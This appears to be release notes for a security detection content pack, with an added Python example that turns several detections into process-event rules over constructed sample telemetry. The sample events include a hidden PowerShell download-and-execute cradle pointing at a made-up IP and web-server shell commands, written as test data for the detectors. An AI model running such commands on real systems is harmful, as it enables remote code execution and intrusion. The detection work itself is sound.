New Analytic Stories
- Silver Sparrow
- HAFNIUM Group
New Detections
- Cobalt Strike Named Pipes
- Suspicious DLLHost no Command Line Arguments
- Suspicious GPUpdate no Command Line Arguments
- Suspicious SearchProtocolHost no Command Line Arguments
- Suspicious PlistBuddy Usage
- Suspicious SQLite3 LSAQuarantine Behavior
- Suspicious Curl Network Connection
- Ryuk Wake on LAN Command
- Suspicious Scheduled Task from Public Directory
- Fodhelper UAC Bypass
- Eventvwr UAC Bypass
- Any PowerShell DownloadString
- Any PowerShell DownloadFile
- Unified Messaging Service Spawning a Process
- Suspicious Unified Messaging Service File Writes
- Nishang PowershellTCPOneLine
- W3WP Spawning Shells
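Several of the detections listed above are simple process-creation checks: a living-off-the-land host (dllhost.exe, gpupdate.exe, SearchProtocolHost.exe) started with no arguments, PowerShell calling DownloadString or DownloadFile, and a web server (w3wp.exe) or Exchange Unified Messaging worker spawning a child. The following is an added example written for this page, not the ESCU searches themselves (those are SPL over the Endpoint data model); it expresses the same kind of logic in Python over constructed Sysmon-style process events. The event shape, hostnames, command lines and the private IP are all assumptions.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class ProcessEvent:
    """One process-creation record, modelled on Sysmon Event ID 1 fields (assumed shape)."""
    host: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# --- Suspicious {DLLHost,GPUpdate,SearchProtocolHost} no Command Line Arguments ---
# These binaries normally carry arguments (e.g. dllhost.exe /Processid:{...});
# an instance whose command line is just the image path is typical of a
# default spawnto target being used as a host for injected code.
NO_ARGS_TARGETS = {"dllhost.exe", "gpupdate.exe", "searchprotocolhost.exe"}


def no_command_line_arguments(ev: ProcessEvent) -> bool:
    name = _basename(ev.image)
    if name not in NO_ARGS_TARGETS:
        return False
    # Tolerate a quoted path and trailing whitespace; anything left after the
    # image name counts as an argument and makes the launch benign here.
    cmd = ev.command_line.strip().strip('"').strip().lower()
    return cmd.endswith(name)


# --- Any PowerShell DownloadString / DownloadFile ---
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
DOWNLOAD_RE = re.compile(r"\.download(string|file)\s*\(", re.IGNORECASE)


def powershell_download(ev: ProcessEvent) -> bool:
    return _basename(ev.image) in POWERSHELL_IMAGES and bool(DOWNLOAD_RE.search(ev.command_line))


# --- W3WP Spawning Shells / Unified Messaging Service Spawning a Process ---
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "bash.exe", "sh.exe"}


def w3wp_spawning_shell(ev: ProcessEvent) -> bool:
    return _basename(ev.parent_image) == "w3wp.exe" and _basename(ev.image) in SHELLS


def um_service_spawning_process(ev: ProcessEvent) -> bool:
    # The Exchange UM worker/service normally spawns nothing, so any child is of interest.
    return _basename(ev.parent_image) in {"umworkerprocess.exe", "umservice.exe"}


RULES: List[Tuple[str, Callable[[ProcessEvent], bool]]] = [
    ("no_command_line_arguments", no_command_line_arguments),
    ("powershell_download", powershell_download),
    ("w3wp_spawning_shell", w3wp_spawning_shell),
    ("um_service_spawning_process", um_service_spawning_process),
]


def run_detections(events: List[ProcessEvent]) -> List[Tuple[str, str, str]]:
    """Return (rule_name, host, child image) for every event that trips a rule."""
    hits = []
    for ev in events:
        for rule_name, rule in RULES:
            if rule(ev):
                hits.append((rule_name, ev.host, _basename(ev.image)))
    return hits


# Constructed sample telemetry (not real data); hostnames and the IP are made up.
SAMPLE_EVENTS = [
    ProcessEvent("ws01", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')\""),
    ProcessEvent("ws01", r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\dllhost.exe",
                 r'"C:\Windows\System32\dllhost.exe"'),
    ProcessEvent("ws02", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\dllhost.exe",
                 r"C:\Windows\System32\DllHost.exe /Processid:{11111111-2222-3333-4444-555555555555}"),
    ProcessEvent("ws03", r"C:\Windows\explorer.exe", r"C:\Windows\System32\gpupdate.exe", "gpupdate.exe /force"),
    ProcessEvent("exch01", r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent("exch01", r"D:\Exchange\Bin\UMWorkerProcess.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c echo test > C:\\inetpub\\wwwroot\\aspnet_client\\t.txt"),
]

if __name__ == "__main__":
    for hit in run_detections(SAMPLE_EVENTS):
        print(hit)
```

Two caveats worth carrying into the real searches: the DownloadString/DownloadFile rule matches only the literal method name on the command line, so a payload passed through `-EncodedCommand` or built from string concatenation will not trip it and needs script-block logging instead; and the no-arguments rule deliberately tolerates a quoted path, since an injected launch often appears as `"C:\Windows\System32\dllhost.exe"` with nothing after the closing quote. Tuning normally adds a parent-process filter rather than loosening the argument check.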
Updated Analytic Stories
- Cobalt Strike
- Suspicious MSHTA Activity
Updated Detections
- NTdsutil Export NTDS
- Suspicious MSBuild Path
- Suspicious MSBuild Rename
- Suspicious Microsoft Workflow Compiler Rename
- Detect Regsvr32 Application Control Bypass
- Windows DisableAntiSpyware Registry